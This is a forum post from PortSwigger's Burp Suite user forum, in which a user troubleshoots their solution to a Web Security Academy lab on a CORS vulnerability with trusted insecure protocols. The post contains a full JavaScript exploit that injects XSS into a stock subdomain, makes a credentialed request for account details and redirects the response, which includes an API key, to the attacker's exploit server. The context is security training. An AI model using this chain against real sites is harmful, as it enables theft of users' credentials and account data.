Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Why is my exploit not working for lab: CORS vulnerability with trusted insecure protocols

inkfish | Last updated: Jul 24, 2023 06:59PM UTC

My exploit works perfectly when I try it on myself but not when I click "Deliver exploit to victim". As far as I can tell mine is functionally identical to the official solution. This is mine: <script> if (!window.location.search) {// to stop it looping shopDomain = "https://LAB-ID.web-security-academy.net/"; stockDomain = "https://stock.LAB-ID.web-security-academy.net/"; exploitUrl = window.location.toString(); xssPayload = `<script>let req=new XMLHttpRequest();req.onload=()=>{window.location="${exploitUrl}?".concat(req.responseText)};req.open("get","${shopDomain}accountDetails",true);req.withCredentials=true;req.send();`; window.location = `${stockDomain}?productId=${encodeURI(xssPayload)}%3c%2f%73%63%72%69%70%74%3e&storeId=1` } </script> Then I view the access log to retrieve the API key from the second request. When delivering to victim there is only the first request. Removing the if statement makes no difference. I had the same issue with another CORS lab yesterday (I think it was "CORS vulnerability with trusted null origin") where it worked when testing on myself but not when delivering to victim. Copying the official solution worked. Am I doing something wrong or is this a problem on PortSwigger's end?

Ben, PortSwigger Agent | Last updated: Jul 25, 2023 05:08PM UTC